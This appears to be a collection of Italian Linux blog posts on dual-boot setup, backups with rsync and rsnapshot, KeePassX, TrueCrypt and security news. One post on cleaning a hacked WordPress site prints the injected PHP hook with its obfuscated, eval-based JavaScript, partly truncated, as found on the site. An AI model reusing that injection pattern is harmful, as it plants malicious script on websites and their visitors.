Capisco che c’è chi viene attirato irresistibilmente dal nuovo e non resiste e preme il bottone “aggiorna versione”.

Visto che non c’è il bottone “ritorna al sistema precedente” ecco come fare e come ho fatto ai tempi di utilizzo di kubuntu:

Partizionamento con 4 partizioni per Gnu/linux con windows:

sda1 ntfs win
sda2 ntfs dati windows condivisi ntfs
sda3 ext4 12 gb per sistema ubuntu versione 1
[sda4 estesa che contiene le logiche sequenti]
sda5 ext4 12 gb per sistema ubuntu versione 2
sda6 ext4 dati/impostazioni utenti ubuntu montato come /home su entrambi sistemi
sda7 swap per entrambi

Etichettare le partizioni per evitare confusione:

sudo e2label /dev/sdaX nome_etichetta

Durante l’installazione va scelto il partizionamento manuale/esperto, assegnare mount point /home senza formattazione alla partizione che contiene la home dei vari utenti, assegnare mount point / alla partizione del sistema.

Facendo così si hanno i due sistemi in parallelo e si può testare il funzionamento della nuova versione senza rinunciare al sistema vecchio.

They show that about 16 per cent of infections hit Macs. They didn’t show any infections on Linux machines. Turner said that Jnanabot attacks on the open source platform weren’t able to survive a reboot.

Per utenti firefox c’è una soluzione elegante per anonimizzarci almeno un po’: GoogleSharing, un servizio che mescola tramite server proxy le richieste a google e rende impossibile associarle ad un singolo utente. Ecco l’estensione per firefox.

Sul sito anche le istruzioni come installare il proxy per dare una mano al progetto.

Anche se penso che il backup conviene di farlo in manuale, sapendo cosa fa e come lo fa e andrebbe conosciuto il filesystem Gnu/Linux che non è complicato: Per chi vuole una GUI ecco Backintime.

Praticamente fa lo stesso come rsnasphot.

Guide qui, qui, qui.

Facile installazione con

qmake
make
sudo make install

mentre per Ubuntu e altre distro ci sono pacchetti pronti. Un vantaggio: è disponibile per tutti sistemi operativi, da Linux a Mac a Windows, quindi puoi usare lo stesso file datase.

Facile anche la configurazione, basta creare un file di database (mettendo un punto davanti al nome è nascosto) e scegliere un passwd. La cosa migliore è l’opzione autofill ovvero: Basta aprire nel browser preferito la pagina dove si vuole usare il passwd manager, creare la voce per la coppia nome_utente:passwd, cliccare su Tools > select target window e del pop-up basta selezionare la finestra del Browser. In Utilità >Impostazioni > avanzate spuntare la casella “utilizza i titoli della voce…” e scegliere una scorciatoia, tipo Alt+e.

Dopo basta premere alt+e alla pagina di login, KeePassX compila i campi e preme pure invio. Questo per ora funziona solo su Linux.

Attenzione: l’apertura di questo sito potrebbe danneggiare il tuo computer!

e nei risultati d ricerca:

www.sito.com
Questo sito potrebbe arrecare danni al tuo computer.

L’infezione aggiungeva uno script in fondo a tutte la pagine. In index.php e altri file si trovava il codice che conteneva:

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t(){return z($a);}var $a="Z73tZ3dZ22Z2573tZ253dZ2522Z2524Z2561Z253dstZ253bdZ2563Z2573Z2528Z2564Z2561+
Z2564Z2562Z252bdZ2563+Z2564Z2564+Z2564eZ252cZ2531Z2530Z2529;Z2564Z ecc ecc
=0;eval(t());';}//important security update ?>

Se sono compromesse installazioni wordpress (nel mio caso):

• Segnarsi la data di modifica di index.php e/o altri file infetti
• cambiare passwd FTP e assicurarsi che sul proprio PC non siano presenti trojan che leggano il passwd di client come filezilla. Magari usare un cd live di ubuntu per pulire il sito, nel dubbio
• reinstallare wordpress, joomla ecc, e nel caso che i file di wordpress si trovano in un altra directory del sito sostituire il file index.php, che nel caso che sia infetto pesa 6.5kb invece di 104b.
• Controllare la data di modifica degli script in /cgi-bin e sostituirli con i backup nel caso che siano infetti. Nel caso mio erano infetti anche counter.cgi che viene chiamato da molte pagine.Controllare anche eventuali file *.htm che sono modificati, nel caso mio c'erano 3 o 4 infetti con uno javascript.
• Controllare se è presente un script tipo "chat.pl", nel caso mio era un backdoor per accedere al server senza passwd e eliminarlo
• Controllare se nella root sia presente mailcheck.php e eliminarlo.

Ecco la notizia. Sembrano anche affetti account gmail.

Se Bruce Schneier dice che il pericolo sarebbe serio è serio davvero.

Dettagli in italiano qui.

1) Questo file – salvato con nome “backup” in /home/utente/bin e reso eseguibile in “proprietà” – crea una copia sincronizzata della /home/utente su un disco USB (ma anche su una cartella di rete, su un altro disco ecc)

#–exclude=espressione da escludere
rsync -auv –exclude=.local – -exclude=.thumbnails v – -delete – -stats /home/UTENTE/ /media/NOME_DISCO/backup_UTENTE

NOTA: si vede male ma per le opzioni estese ci vogliono due trattini – -
Altre opzioni:

man rsync

Da ora in poi basta scrivere “backup” nel terminale per aggiornare il backup: verranno copiati solo i file nuovi, quelli modificati e cancellati anche nel backup quelli non più esistenti.

2) In K/X/Ubuntu in un momento di perfetto funzionamento dare

dpkg –get-selections > ~/pacchetti_installati.txt

Se dovrebbe essere necessario una reinstallazione (anche su PC diverso) basta il comando

sudo bash
dpkg –set-selections < ./pacchetti_installati.txt && apt-get dselect-upgrade

per reinstallare tutti i programmi.

3) Se si sono fatte modifiche in /etc (xorg.conf, alsa-base) vanno copiati anche questi file modificati nel backup

4) Infine si può fare un immagine della partizione del sistema: Avviare da CD live, e dare

dd if=/dev/sdaX of=/media/NOME_DISCO/immagine-sdaX

con X il numero della partizione (sudo fisk -l per vedere tutti)

Il ripristino si fa con

dd if=/media/NOME_DISCO/immagine-sdaX of=/dev/sdaX

La medaglia d’oro però va a rsnapshot. Elimina un grosso difetto della soluzione con rsync: cancellando un file o cartella per sbaglio e facendo di seguito un backup con rsync si cancellano anche sul backup, a meno di non usare l’opzione –delete, sconsigliato.

Praticamente abbiamo più versioni della nostra home sul backup mentre i file identici esistono solo una volta grazie ai hardlink di ext3, quindi un enorme risparmio di spazio, nel esempio sotto tutto il backup ammonta a 88gb mentre una cartella monthly* o weekly* a 44gb, cioè la dimensione della mia home:

La configurazione è un po’ ostile e va fatto nel file /etc/rsnapshot.conf, riporto le cose essenziali:

#################################################
# rsnapshot.conf – rsnapshot configuration file #
#################################################
#
# OSSERVARE QUESTE REGOLE:
#
# Questo file richiede TAB per spaziare tra gli elementi
#
# Percorsi devono finire con /:
# corretto: /home/
# sbagliato: /home
#
###########################
# SNAPSHOT ROOT DIRECTORY #
###########################

# Tutti backup verranno salvati in questo percorso
# Dare una etichetta con gparted a un eventuale disco USB
# per assicurarsi che viene sempre montato nello stesso percorso in /media
# Esempio:
snapshot_root /media/nome_etichetta/backup/

# If no_create_root is enabled, rsnapshot will not automatically create the
# snapshot_root directory. This is particularly useful if you are backing
# up to removable media, such as a FireWire or USB drive.
#
no_create_root 1

#################################
# DIPENDENZE DA PROGRAMMI ESTERNI #
#################################

cmd_cp /bin/cp

cmd_rm /bin/rm

cmd_rsync /usr/bin/rsync

# Scommenta per attivare remote ssh backup.
#
#cmd_ssh /usr/bin/ssh

# Commenta per disabilitare log.
#
cmd_logger /usr/bin/logger

cmd_du /bin/du

#########################################
# INTERVALLI DEL BACKUP
# Univoci e in ordine ascendente
# i.e. hourly, daily, weekly, etc.
# Esempio: 5 versione backup da tenere del weekly, 3 dal monthly
#########################################

#interval hourly 6
#interval daily 3
interval weekly 5
interval monthly 3

############################################
# GLOBAL OPTIONS #
# All are optional, with sensible defaults #
############################################

# Verbose level, 1 through 5.
# 1 Quiet Print fatal errors only
#2 Default Print errors and warnings only
#3 Verbose Show equivalent shell commands being executed
# 4 Extra Verbose Show extra verbose information
# 5 Debug mode Everything
#
verbose 3

# Same as “verbose” above, but controls the amount of data sent to the
# logfile, if one is being used. The default is 3.
#
loglevel 3

# If you enable this, data will be written to the file you specify. The
# amount of data written is controlled by the “loglevel” parameter.
#
logfile /var/log/rsnapshot

# Il file di lock, per non avere due volte rsnapshot in esecuzione.
# Per evitare errori di permessi scegliere la home
lockfile /home/nomelogin/rsnapshot.pid

# Argomenti corti e lunghi passati a rsync. Per dettagli: rsync –help

rsync_short_args -auvp
rsync_long_args –stats

# ssh has no args passed by default, but you can specify some here.

#ssh_args -p 22

# Default arguments for the “du” program (for disk space reporting).
# The GNU version of “du” is preferred. See the man page for more details.
# If your version of “du” doesn’t support the -h flag, try -k flag instead.
#
du_args -csh

# If this is enabled, rsync won’t span filesystem partitions within a
# backup point. This essentially passes the -x option to rsync.
# The default is 0 (off).
#
#one_fs 0

# I parmetri include e exclude [pattern] passati a rsync.
#Multipli argomenti su righe singole
# Dettagli nella rsync man page
#Esempi: nessun backup del cestino e dei dischi di virtualbox
#include XXXX
exclude .local
exclude .vdi

# The include_file and exclude_file parameters, if enabled, simply get
# passed directly to rsync. Please look up the –include-from and
# –exclude-from options in the rsync man page for more details.
#
#include_file /path/to/include/file
#exclude_file /percorso/al/file

# If your version of rsync supports –link-dest, consider enable this.
# This is the best way to support special files (FIFOs, etc) cross-platform.
# The default is 0 (off).
#
link_dest 1

# The default is 0 (off).
#
#sync_first 0

#The default is 0 (off).
#
#use_lazy_deletes 0

# Number of rsync re-tries. If you experience any network problems or
# network card issues that tend to cause ssh to crap-out with
# “Corrupted MAC on input” errors, for example, set this to a non-zero
# value to have the rsync operation re-tried
#
#rsync_numtries 0

###############################
### BACKUP / SCRIPTS ###
###############################

# LOCALHOST
#backup /home/arch/.mozilla mozilla/
backup /etc/ etc/
backup /home/nome_utente/ nome_utente/
#backup /usr/local/ localhost/
#backup /var/log/rsnapshot localhost/
#backup /etc/passwd localhost/
#backup /home/foo/My Documents/ localhost/
#backup /foo/bar/ localhost/ one_fs=1, rsync_short_args=-urltvpog
#backup_script /usr/local/bin/backup_pgsql.sh localhost/postgres/

# EXAMPLE.COM
#backup_script /bin/date “+ backup of example.com started at %c” unused1
#backup root@example.com:/home/ example.com/ +rsync_long_args=–bwlimit=16,exclude=core
#backup root@example.com:/etc/ example.com/ exclude=mtab,exclude=core
#backup_script ssh root@example.com “mysqldump -A > /var/db/dump/mysql.sql” unused2
#backup root@example.com:/var/db/dump/ example.com/
#backup_script /bin/date “+ backup of example.com ended at %c” unused9

# CVS.SOURCEFORGE.NET
#backup_script /usr/local/bin/backup_rsnapshot_cvsroot.sh rsnapshot.cvs.sourceforge.net/

# RSYNC.SAMBA.ORG
#backup rsync://rsync.samba.org/rsyncftp/ rsync.samba.org/rsyncftp/

Una volta create le cartelle e messo a posto il file possiamo lanciare rsnapshot con gli argomenti che abbiamo specificato:

rsnapshot weekly
o
rsnapshot monthly

Se usiamo un disco usb conviene di lanciarlo manualmente in quanto non sarà sempre montato. Se invece facciamo un backup in rete o su un secondo disco fisso possiamo inserire i comandi in /etc/cron.daily salvando in questa directory un semplice script eseguibile:

!#/bin/bash
rsnapshot daily

Stesso procedimento per cron.weekly e eventualmente cron.monthly con script analogici, cioè rsnapshot weekly
rsnapshot monthly

Adesso basta installare anacron se la macchina non è sempre accesa per far sì che vengono sempre eseguiti.

Microsoft has added the random-number generator Dual_EC-DRBG to Windows Vista, as part of SP1. Yes, this is the same RNG that could have an NSA backdoor.
It’s not enabled by default, and my advice is to never enable it. Ever.
EDITED TO ADD (12/18): I should make this clear that the algorithm is available as a program call. It is not something that the user can enable or disable.

Prima installare la versione giusto per il kernel. Ci sono due GUI grafici per truecrypt in giro, una (Forcefield) non mi funzionava, l’altra (tcGUI) si installava bene ma mi mancava il Java 6 che sono 32 MB è non aveva voglia di scaricarlo con la connessione dialup, quindi non posso esprimermi sul suo funzionamento. Ma lo script di installazione setta bene i permessi per eseguire truecrypt senza sudo, sembra.

Come si creano i volumi è descritta benissimo in questo wiki e un altra risorsa è qui. Ho creato un volume nella mia home .data.tc di 6 Gb e l’ho formattato in ext3. Idem ho creato una cartella di nome .data sempre nella home. Il comando

$truecrypt .data.tc .data

monta la cartella (se il filesystem è FAT va aggiunto l’opzione -u). Un

$sudo chown -R [nome_utente] .data

la rende usabile alla fine . Ora si possono muovere i file che si vogliono criptare sempre in /home/nome_utente/.data; per esempio la cartella “Documents”, la cartella .mozilla-thunderbird e .mozilla. Consiglio: chiudere le app che usano i file (cioè Firefox e Thunderbird) e poi solo copiarci il contenuto, di seguito rinominare le cartelle tipo .mozilla-thunderbird.backup. Alla fine basta marcare il contenuto di .data e trascinarlo nella /home/utente e scegliere “collega qui” dal menu che appare (Kubuntu).

Ora viene il bello. Per non montare sempre al login il disco virtuale con i nostri dati ho trovato (e modificato) bel script. Salvarlo in ~/bin e renderlo eseguibile. Spostarsi in ~/.kde/Autostart > crea > collegamento ad un applicazione > selezionare mount_data.sh

selezionarla il mount_data.desktop > proprietà > terza scheda > comando inserire mount_data.sh /home/nome_utente/.data.tc /home/nome_utente/.data/

Intanto che ci siamo in questa cartella: Trascinare e copiare dentro dal menu avvio le icone Firefox e Thunderbird, e sempre nella terza scheda inserire un “sleep” davanti:
sleep 10 && kstart –desktop 1 mozilla-thunderbird.
Il “kstart” si spiega da solo. In questo modo facciamo che Thunderbird si avvia soltanto dopo che abbiamo dato il password nel dialogo.

Se non si monta .data.tc né Firefox né Thunderbird si avviano, perché trovano per i loro dati un collegamento a una cartella vuota. Per la perfezione ci vorebbe uno script che smonta la cartella al logout, ma le ricerche finora andavano a vuoto.

Per testare: fare un logout, un login da shell (Alt+ctrl+F1), smontare con

$truecrypt -d

e controllare con

$truecrypt -vl

e un login normale. Dovrebbe apparire questo:

#smontare i dischi criptati
sleep 10 && truecrypt -d

L’unica cosa che fa la bizze è il comando

$truecrypt -d

che dovrebbe smontare la carte dei dati: a volte non funziona neanche con sudo, dicendo “device occupato”.

Per smontare tutti i dischi cifrati: Aprire (o creare se non esiste) ~/.bash_logout e aggiungere in fondo :

#smontare i dischi criptati
sleep 10 && truecrypt -d

Un altra opzione è di inserire la chiamata dello script per montarla non in ~/.kde/Autostart ma in fondo nel file .profile

#per montare i dati sensibili
mount_data.sh /home/nome_utente/.data.tc /home/nome_utente/.data/

Facendo così la richiesta del password appare subito dopo quella del login, ma mette tanto a montare.

It is a simple brute force attack, dumb as a rock that just tries keys. If it gets one, you manually have to check it and try activation. Is is ugly, takes hours, is far from point and click, but it is said to work.

Actually, it is a perverted Linux distribution made to be as insecure as possible. It is collection of IT-Security and IT-Anti-Security tools. Additional it includes a fullscaled lesson based environment for Attack & Defense on/for IT systems for self-study or teaching activities during university lectures. It’s a Live Linux Distro, which means it runs from a bootable CD in memory without changing the native operating system of the host computer. As well it can be run within virtual machine environments, such as qemu or vmware. There is no need to install a virtual machine if you use the embedded option. Its sole purpose in life is to put as many security tools at your disposal with as much training options as it can. It contains a huge ammount of lessons including lesson description – and solutions if the level has been solved by a community member at crackmes.de.

Damn Vulnerable Linux (DVL) is meant to be used by both novice and professional security personnel but is not ideal for the Linux uninitiated. Damn Vulnerable Linux (DVL) assumes you know the basics of Linux as most of your work will be done from the command line. If you are completely new to Linux, it’s best you stop playing with this system.

Technorati Tags: linux

John Markoff did an effective job of telling us how bad things are. Botnets (infected PCs under the control of bad guys) represent over 10% of the PCs connected to the Internet. Microsoft Vista illegal copies are already for sale in China, in spite of Microsoft’s efforts. According to Microsoft, over a third of illegal copies of their OSs come with trojan infections pre-installed.

(J. Markoff facevo un riassunto perfetto spegando quanto male stanno le cose . I botnet (Pc infestati di trojan sotto controllo di criminali connessi tra loro) rappresentando più del 10% delle macchine connesse a Internet. Copie illegali di Windows Vista sono già in vendità in Cina, nonostante le fatiche di Microsoft. Secondo l’azienda di Redmont un terzo delle copie illegali di Windows contengano già trojan preinstallati.)

McAfee (up $0.00 to $24.46, Charts), Symantec (down $0.49 to $20.79, Charts) and other security software companies argue Microsoft’s new Vista operating system will make it more difficult to protect customers because for the first time, they have been denied access to the core of the operating system.

They say they are denied access to the heart of the operating system through built-in software locks, which makes it much harder to protect.

“Microsoft is being completely unrealistic if, by locking security companies out of the kernel [core], it thinks hackers won’t crack Vista’s kernel. In fact, they already have,” the advert in the Financial Times read.

[articolo]